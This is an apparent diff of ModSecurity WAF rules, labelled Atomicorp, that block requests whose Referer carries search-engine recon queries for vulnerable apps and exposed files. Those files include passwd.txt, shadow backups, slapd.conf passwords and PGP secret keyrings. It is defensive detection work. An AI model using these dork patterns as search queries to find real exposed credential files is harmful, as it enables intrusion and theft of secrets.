+SecRule REQUEST_HEADERS:Referer   "inurl:install/install\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372017,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:intranet admin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372018,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:info\.inc\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372021,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:footer\.inc\.php" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372022,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:search\.php vbulletin" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372023,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:veo observer xt -inurl:shtml\|pl\|php\|htm\|asp\|aspx\|pdf\|cfm -in(?:text|body):observer" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372057,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:netbotz appliance -inurl:\.php -inurl:\.asp -inurl:\.pdf -inurl:securitypipeline -announces" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372096,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:idvr -intitle:com \| net \| shop -inurl:asp \| htm \| pdf \| html \| php \| shtml \| com \| at \| cgi \| tv" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372099,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:flash operator panel -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372146,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:panorama-viewer\.php\?id=" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372255,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+
+SecMarker END_RECON_CHECKS_INURL_PHP
+
+SecRule REQUEST_HEADERS:Referer  "inurl.*/cgi-bin/query" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350004,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: /cgi-bin/guery Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*wps_shop\.cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350006,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: wps_shop.cgi Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*passwd.txt.*wwwboard.*webadmin" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:351008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: passwd.txt Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*admin\.mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350008,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: admin.mdb Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "file upload manager v1\.3.*rename to" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350011,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "wwwboard webadmin.*inurl:passwd\.txt wwwboard\|webadmin" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350014,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*webutil\.pl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350021,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl:.*com_koesubmit" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350024,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl.*estore/index\.cgi\?" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350026,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl:.*id=.*\&.*intext.*warning: ?(?:mysql_fetch_assoc|mysql_num_rows|session_start|getimagesize|is_writable|unknown|mysql_result|pg_exec|mysql_result|mysql_query|array_merge|preg_match|filesize|require)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer  "inurl: ?com_jeauto" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:350032,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: LFI Search Engine Recon attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:root\.asp\?acs=anon" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371002,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:conf inurl:proftpd\.conf -sample " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:admin filetype:asp inurl:userlist" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371011,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:admin inurl:userlist" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371012,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:tmtrack\.dll\?" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:polly/cp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371020,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:net2ftp powered by net2ftp inurl:ftp or in(?:text|body):login or inurl:login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371021,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:connectcomputer/precheck\.htm \| inurl:remote/logon\.aspx" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371028,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:81/cgi-bin/\.cobalt/.*in(?:text|body):welcome to the cobalt raq" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371029,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "adding new user inurl:addnewuser -there are no domains" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371031,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:calendarscript/users\.txt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371039,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:editor/list\.asp \| inurl:database_editor\.asp \| inurl:login\.asa are set" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371045,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:yml database inurl:config" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371049,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:sites\.dat\+pass=" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371050,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/yabb/members/admin\.dat" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371052,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:dat inurl:sites\.dat" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371057,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cgi-bin inurl:calendar\.cfg" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371060,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:dat inurl:pass\.dat" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371062,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:perform\.ini filetype:ini" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371063,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "wwwboard webadmin inurl:passwd\.txt wwwboard\|webadmin " "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371067,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:txt inurl:unattend\.txt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371069,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:filezilla\.xml -cvs" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371079,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:dupics inurl:\(add\.asp \| default\.asp \| view\.asp \| voting\.asp\) -site:duware\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371083,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ini inurl:serv-u\.ini" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371091,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:ini inurl:flashfxp\.ini" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371094,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:bak inurl:htaccess\|passwd\|shadow\|htusers" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/db/main\.mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371104,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:nuke filetype:sql" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371105,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/wwwboard" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371109,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:pwd inurl:\(service \| authors \| administrators \| users\) # -frontpage-" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371111,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:conf inurl:psybnc\.conf user\.pass=" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371116,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:mdb inurl:users\.mdb" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371117,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:log inurl:ccbill" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371118,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:slapd\.conf in(?:text|body):rootpw" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371130,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:slapd\.conf in(?:text|body):credentials -manpage -manual page -man: -sample" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371131,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:url \+inurl:ftp:// \+inurl:@" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371138,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:vtund\.conf in(?:text|body):pass -cvs" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371139,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:perform filetype:ini" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371145,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl: admin mdb " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371149,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:secring ext:skr \| ext:pgp \| ext:bak" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371151,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:auth_user_file\.txt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371157,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:configuration\.file inurl:softcart\.exe" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371190,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:sitebuilderpictures" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371235,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:sitebuilderfiles" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371236,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:sitebuildercontent" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371237,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype: log inurl:access\.log \+in(?:text|body):http/1\.1" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371246,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "cisco pix security appliance software version \+ serial number \+ show ver -inurl" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371247,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "\(intitle:prtg traffic grapher inurl:allsensors\)\|\(intitle:prtg traffic grapher - monitoring results\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371251,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:build\.err " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371255,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/cgi-bin/pass\.txt" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371256,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:bookmarks inurl:bookmarks\.html bookmarks toolbar folder add bookmarks to this folder to see them displayed on the bookmarks toolbar" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371260,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:\(doc \| pdf \| xls \| txt \| ps \| rtf \| odt \| sxw \| psw \| ppt \| pps \| xml\) \(in(?:text|body):confidential salary \| in(?:text|body):budget approved\) inurl:confidential" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371266,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "site:www\.mailinator\.com inurl:showmail\.do" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371267,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:cdkey\.txt" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371268,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:xccdonts\.asp" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371271,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:plist filetype:plist inurl:bookmarks\.plist" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371277,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "machttp filetype:log inurl:machttp\.log" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371279,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:weblog/referrers" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371280,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:getmsg\.html intitle:hotmail" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371283,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:netscape\.hst " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371287,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:bookmark\.htm" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371288,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:netscape\.hst " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371289,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:netscape\.ini " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371290,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:txt inurl:dxdiag" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371293,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:cnf inurl:_vti_pvt access\.cnf" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371300,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:preferences\.ini \[emule\]" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371302,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:conf inurl:rsyncd\.conf -cvs -man" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371303,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:ds\.py" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371304,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "inurl:/axs/ax-admin\.pl -script" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371309,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
